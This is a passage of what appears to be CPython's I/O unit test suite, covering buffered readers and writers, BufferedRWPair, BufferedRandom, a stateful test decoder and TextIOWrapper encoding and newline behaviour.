class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
# writable() returns True, so there's no point to test it over
# a writable stream.
test_truncate_on_read_only = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
# bpo-41919: This method is separated from StatefulIncrementalDecoder to avoid a resource leak
# when registering codecs and cleanup functions.
def lookupTestDecoder(name):
if StatefulIncrementalDecoder.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=StatefulIncrementalDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
os_helper.unlink(os_helper.TESTFN)
codecs.register(lookupTestDecoder)
self.addCleanup(codecs.unregister, lookupTestDecoder)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, encoding="utf-8", newline=42)
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO(), encoding="utf-8")
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b, encoding="ascii")
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw, encoding="utf-8")
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8", newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getencoding()
b = self.BytesIO()
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
with warnings.catch_warnings():
warnings.simplefilter("ignore", EncodingWarning)
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio, encoding="utf-8").xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(os_helper.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(os_helper.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
